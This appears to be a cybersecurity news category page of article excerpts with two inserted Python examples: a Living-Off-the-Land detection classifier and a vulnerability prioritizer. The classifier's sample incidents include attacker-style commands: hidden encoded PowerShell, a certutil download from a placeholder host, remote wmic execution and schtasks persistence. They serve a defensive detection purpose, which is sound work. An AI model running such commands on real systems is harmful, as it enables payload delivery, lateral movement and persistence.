Threat Intelligence | Breaking Cybersecurity News | The Hacker News

Category — Threat Intelligence
Identity-First Security: A Multilayered Approach to Reducing Identity Attack Risk

Jun 02, 2025
Identity Is the New Perimeter—And It's Fractured

In 2025, identity isn't just a security issue—it's the battleground. And too many organizations are getting caught flat-footed. Organizations today must reckon with complex hybrid environments that contain interconnected endpoints, servers, cloud services, DevOps systems, identity infrastructure, and much more. With enterprise systems no longer fitting neatly into a single network perimeter, the identities used to interact with these systems have become the new perimeter.

A strong cybersecurity foundation starts with clear visibility that puts risk in context. Identity security is no different. In practice, however, identity management is anything but centralized. Building IDs and access to physical offices are handled by one system. Logins to Windows machines are generally managed with Windows domains and Active Directory—but what about Macs and Linux machines? Companies use Okta, Ping Identity, or the equivalent ...
Living Off the Land: What We Learned from 700,000 Security Incidents

May 19, 2025
While emerging risks like AI-generated malware capture headlines, the reality of today's threat landscape is more straightforward. Most modern attacks, including ransomware, are backed by manual, hands-on hacking operations. Attackers carefully navigate systems using a "Living Off the Land" (LOTL) approach, abusing legitimate system utilities that are already present on the host. To measure exactly how common these LOTL binaries are, we analyzed 700,000 security incidents from our Bitdefender GravityZone platform along with telemetry data (legitimate usage) from the last 90 days. The security incidents were not simple alerts but correlated events, and we analyzed the whole chain of commands to identify how frequently attackers use LOTL binaries. The result? 84% of major attacks (high-severity incidents) involved the use of LOTL binaries. For validation, we also examined our MDR data and found a consistent trend: 85% of incidents involved LOTL techniques. While this was our internal research to suppor...
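The classification step described above (walking a correlated command chain and asking whether any link in it is a LOTL binary) as an added example; this is not Bitdefender's analysis code. It runs over constructed process-command chains (sample data, not real telemetry), extracts the executing image from each command line, flags chains that contain a known LOLBin, and reports the share of high-severity versus low-severity incidents that involved one. The LOLBINS set is a short assumed list, not the full catalogue a production analysis would use, and the incident IDs, hostnames and payload strings are placeholders.

```python
"""Classify incident command chains by Living-Off-the-Land (LOTL) binary usage.

Added example with constructed data; not Bitdefender's analysis code.
"""
import shlex
from dataclasses import dataclass
from typing import Dict, List

# Short, assumed list of Windows binaries commonly abused post-exploitation.
# A real analysis would use a curated catalogue (e.g. the LOLBAS project).
LOLBINS = {
    "powershell.exe", "cmd.exe", "wmic.exe", "rundll32.exe", "regsvr32.exe",
    "mshta.exe", "certutil.exe", "bitsadmin.exe", "wscript.exe", "cscript.exe",
    "schtasks.exe", "msiexec.exe", "net.exe", "net1.exe", "reg.exe",
}


@dataclass
class Incident:
    incident_id: str
    severity: str             # "high" or "low"
    command_chain: List[str]  # correlated parent -> child command lines, in order


def binary_name(command_line: str) -> str:
    """Return the lower-cased image name ('powershell.exe') from a Windows command line.

    Handles quoted paths containing spaces and bare names without an extension.
    """
    try:
        first = shlex.split(command_line, posix=False)[0]
    except (ValueError, IndexError):   # unbalanced quotes or an empty line
        return ""
    first = first.strip('"').lower()
    name = first.replace("\\", "/").rsplit("/", 1)[-1]
    return name if name.endswith(".exe") else name + ".exe"


def lolbins_in_chain(chain: List[str]) -> List[str]:
    """LOLBins seen anywhere in the chain, in first-seen order, without duplicates."""
    seen: List[str] = []
    for cmd in chain:
        name = binary_name(cmd)
        if name in LOLBINS and name not in seen:
            seen.append(name)
    return seen


def lotl_share(incidents: List[Incident], severity: str = "high") -> float:
    """Fraction of incidents at the given severity whose chain contains a LOLBin."""
    subset = [i for i in incidents if i.severity == severity]
    if not subset:
        return 0.0
    hits = sum(1 for i in subset if lolbins_in_chain(i.command_chain))
    return hits / len(subset)


def lolbin_frequency(incidents: List[Incident]) -> Dict[str, int]:
    """Number of incidents each LOLBin appears in, most frequent first."""
    counts: Dict[str, int] = {}
    for inc in incidents:
        for name in lolbins_in_chain(inc.command_chain):
            counts[name] = counts.get(name, 0) + 1
    return dict(sorted(counts.items(), key=lambda kv: (-kv[1], kv[0])))


# Constructed sample incidents (not real telemetry); encoded payloads are truncated placeholders.
SAMPLE_INCIDENTS = [
    Incident("INC-001", "high", [
        'winword.exe /n "C:\\Users\\a\\Downloads\\invoice.docm"',
        'cmd.exe /c powershell -nop -w hidden -enc SQBFAFgA',
        'powershell.exe -nop -w hidden -enc SQBFAFgA',
        'certutil.exe -urlcache -split -f http://example.invalid/p.dat C:\\Users\\Public\\p.dat',
    ]),
    Incident("INC-002", "high", [          # custom dropper, no LOLBin in the chain
        '"C:\\Program Files\\Vendor\\updater.exe" --check',
        '"C:\\Program Files\\Vendor\\updater.exe" --apply',
    ]),
    Incident("INC-003", "high", [
        'wmic.exe /node:fileserver process call create "cmd.exe /c whoami"',
        'schtasks.exe /create /tn Updater /tr C:\\Users\\Public\\s.exe /sc minute /mo 5',
    ]),
    Incident("INC-004", "low", ['cmd.exe /c dir C:\\Users']),   # benign admin use
    Incident("INC-005", "low", ['explorer.exe']),
]

if __name__ == "__main__":
    print("high-severity incidents with LOTL:", round(lotl_share(SAMPLE_INCIDENTS, "high"), 3))
    print("low-severity incidents with LOTL: ", round(lotl_share(SAMPLE_INCIDENTS, "low"), 3))
    print("LOLBin frequency:", lolbin_frequency(SAMPLE_INCIDENTS))
```

The point of looking at the whole chain rather than a single alert is visible in INC-001: the first process (winword.exe) is not a LOLBin, and only the children reveal the pattern. The benign cmd.exe use in INC-004 is also why presence of a LOLBin alone is not an alert; the article's comparison against legitimate-usage telemetry is what turns frequency into a detection signal.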
How AI and IoT are Supercharging the DDoS Threat

Apr 21, 2025
The surge in DDoS attack traffic this year has been driven in part by the rapid expansion of IoT devices: from smart watches and home appliances to cars, hundreds of millions of new devices are joining the global internet. Many of these new devices ship with poor security and are easily absorbed into attackers' botnets.

It is true that the DDoS threat grows alongside internet expansion. But the relationship isn't linear. The true catalyst behind this surge lies in the mass availability of botnet-for-hire platforms and low-barrier attack tools. Meanwhile, the number of high-value targets, such as financial institutions, governments, and critical infrastructure, remains relatively fixed. The result is a growing imbalance, in which more attackers are armed with more tools, targeting the same essential services with increasing frequency and complexity.

How AI Makes DDoS More Dangerous

AI and machine learning are impacting the evolution of DDoS strategies and tactics. T...
CTM360 Uncovers a Large-Scale Fake Play Store Scam Targeting Global Users: PlayPraetor Trojan

Mar 10, 2025
CTM360 has recently observed a sophisticated global scam campaign in which victims are lured through fraudulent Google Play Store download pages. CTM360, a leading cybersecurity company for Digital Risk Protection, has identified over 6,000 instances of these fake pages, which trick users into downloading malicious apps. Once installed, the apps disguise themselves as legitimate software to deploy PlayPraetor (malware named after the Roman praetor, a magistrate with broad authority). It seizes control of infected devices to steal banking credentials, log keystrokes, and monitor clipboard activity. The operation's global reach and complexity point to a highly coordinated effort to compromise users' data.

How the Scam Works

Threat actors behind PlayPraetor execute a well-crafted deception strategy:

Fake Play Store Pages – Cybercriminals create highly realistic clones of the Google Play Store and other trusted sources to distribute Trojanized APKs.

Malicious APKs Disguised as L...
Why Now is the Time to Adopt a Threat-Led Approach to Vulnerability Management

Mar 03, 2025
What is Threat-Led Vulnerability Management?

Threat-Led Vulnerability Management (TLVM) is a security approach that prioritizes and manages vulnerabilities based on the current threat landscape and the specific risks posed to an organization. Rather than treating all vulnerabilities equally, TLVM emphasizes understanding which vulnerabilities are most likely to be exploited by malicious actors, correlated with the configuration state and security posture of the organization's unique infrastructure and business processes.

Why Now?

The notion of adopting a Threat-Led Vulnerability Management (TLVM) approach has grown in popularity, particularly in the face of the escalating volume and sophistication of cyber threats, which are increasingly frequent and cheaper to mount when supported by AI tools. The dynamic nature of the threat landscape requires organizations to stay agile in their vulnerability management processes, prioritizing efforts based on ...
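A concrete version of the prioritization described above, added here as an example; it is not the page's own material or any vendor's product logic. It scores each finding by scanner severity weighted by exploitation likelihood, exposure, asset criticality and existing compensating controls, then contrasts the resulting order with a CVSS-only order. The finding labels, asset names, weights, and the "known-exploited" and "exploit probability" inputs are all constructed assumptions; a real deployment would feed those last two from a known-exploited-vulnerabilities catalogue and an EPSS-style score.

```python
"""Threat-led vs. severity-only vulnerability prioritization on a constructed inventory.

Added example; the weights are illustrative assumptions, not a published standard.
"""
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class Finding:
    label: str                  # constructed identifier, not a real CVE
    asset: str                  # constructed hostname
    cvss_base: float            # 0.0 - 10.0 severity from the scanner
    exploited_in_wild: bool     # present in a known-exploited feed (assumed input)
    exploit_probability: float  # 0.0 - 1.0 model estimate, EPSS-style (assumed input)
    internet_exposed: bool      # reachable from outside, per the asset inventory
    asset_criticality: int      # 1 (lab box) .. 5 (crown-jewel system)
    mitigated_by_control: bool  # a compensating control already blocks the known path


def threat_led_score(f: Finding) -> float:
    """Severity weighted by how likely *this* finding is to be exploited on *this* asset."""
    likelihood = f.exploit_probability
    if f.exploited_in_wild:
        likelihood = max(likelihood, 0.9)   # confirmed exploitation overrides a model estimate
    exposure = 1.0 if f.internet_exposed else 0.4
    criticality = f.asset_criticality / 5.0
    score = f.cvss_base * likelihood * exposure * criticality * 10
    if f.mitigated_by_control:
        score *= 0.25                        # still tracked, but not the next fire to put out
    return round(score, 2)


def prioritize(findings: List[Finding]) -> List[str]:
    """Labels ordered by threat-led score, highest first."""
    return [f.label for f in sorted(findings, key=threat_led_score, reverse=True)]


def severity_only(findings: List[Finding]) -> List[str]:
    """Labels ordered by CVSS base score alone, for comparison."""
    return [f.label for f in sorted(findings, key=lambda f: f.cvss_base, reverse=True)]


# Constructed findings (not real CVEs or assets).
SAMPLE_FINDINGS = [
    Finding("FND-1", "build-agent-07", 9.8, False, 0.02, False, 2, False),
    Finding("FND-2", "vpn-gateway", 7.5, True, 0.30, True, 5, False),
    Finding("FND-3", "web-portal", 8.8, True, 0.95, True, 4, True),
    Finding("FND-4", "api-edge", 6.5, False, 0.60, True, 3, False),
]

if __name__ == "__main__":
    print("severity-only order:", severity_only(SAMPLE_FINDINGS))
    print("threat-led order:   ", prioritize(SAMPLE_FINDINGS))
    for f in SAMPLE_FINDINGS:
        print(f"{f.label} {f.asset:<16} cvss={f.cvss_base:<4} tlvm={threat_led_score(f)}")
```

On this inventory the CVSS 9.8 finding on an internal build agent with no exploitation evidence drops to the bottom, while a CVSS 7.5 on an internet-facing VPN gateway that is being exploited in the wild comes first; the CVSS 8.8 on the web portal is pushed down only because a compensating control is recorded, which is exactly the "configuration state and security posture" correlation the passage describes.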
Shadow AI is Here — Is Your Security Strategy Ready?

Feb 24, 2025
Shadow AI is presenting new challenges for security leaders. While AI tools have already revolutionized how we work, they've also created unprecedented security challenges that our traditional strategies and tools simply weren't designed to handle. I've spent the last decade working with organizations grappling with emerging tech risks, and I can tell you that this is different. In this post, we'll talk about why, and more importantly, what you can do about it.

The Hidden Risks of AI Adoption: Shadow AI

The Wiz research team recently uncovered a publicly exposed DeepSeek production ClickHouse database, leaking chat history, API secrets, and other sensitive data—raising serious concerns for any organization using DeepSeek's models. The truth is that many teams rushed to try out DeepSeek given the hype around its advanced models. While the DeepSeek situation has been surrounded by FUD, drama, and misinformation, it has also set important precedents for privacy ...
How Hackers Exploit Your Attack Surface (And How to Protect Yourself)

Feb 17, 2025
Hackers are constantly scanning your network, often spotting vulnerabilities before you do. They're looking for misconfigurations, exposed assets, and weak points that could lead to a breach—are you seeing what they see? Every activity or interaction your organization has online (website, social media accounts, cloud services, third-party integrations, and more) contributes to its digital footprint. This digital footprint is the information attackers use to find your weaknesses and attempt to exploit them.

What if you could anticipate how hackers plan to exploit your vulnerabilities before they strike? Imagine identifying the weaknesses most enticing to an attacker before they are exploited. Attack Surface Management (ASM) solutions help organizations continuously identify, monitor and manage public-facing IT assets, including those that may have been forgotten. ASM is the tool in the battle for visibility: either you see your weaknesses first, or attackers will show ...
Hacking in the name of

Feb 03, 2025
Since Russia's escalation with its invasion of Ukraine in 2022, hacktivism has surged, impacting both private and public sectors through DDoS attacks, defacements, and disinformation campaigns. These cyberattacks align with geopolitical events. With over 50 countries holding elections in 2024, conditions were particularly ripe for influence operations such as misinformation and propaganda campaigns. DDoS attacks have also intensified, with one pro-Russian hacktivist group alone claiming over 6,000 attacks since March 2022. Driven by political tensions and geopolitical conflicts, we saw a significant increase in both volume and intensity. Hacktivists are now more experienced, leveraging DDoS-for-hire services and sophisticated tools. To better understand this complex threat landscape, we aim to explore current hacktivism more deeply, examining its various facets and connections to geopolitical tensions, building on our previous findings. This article doesn't cover ...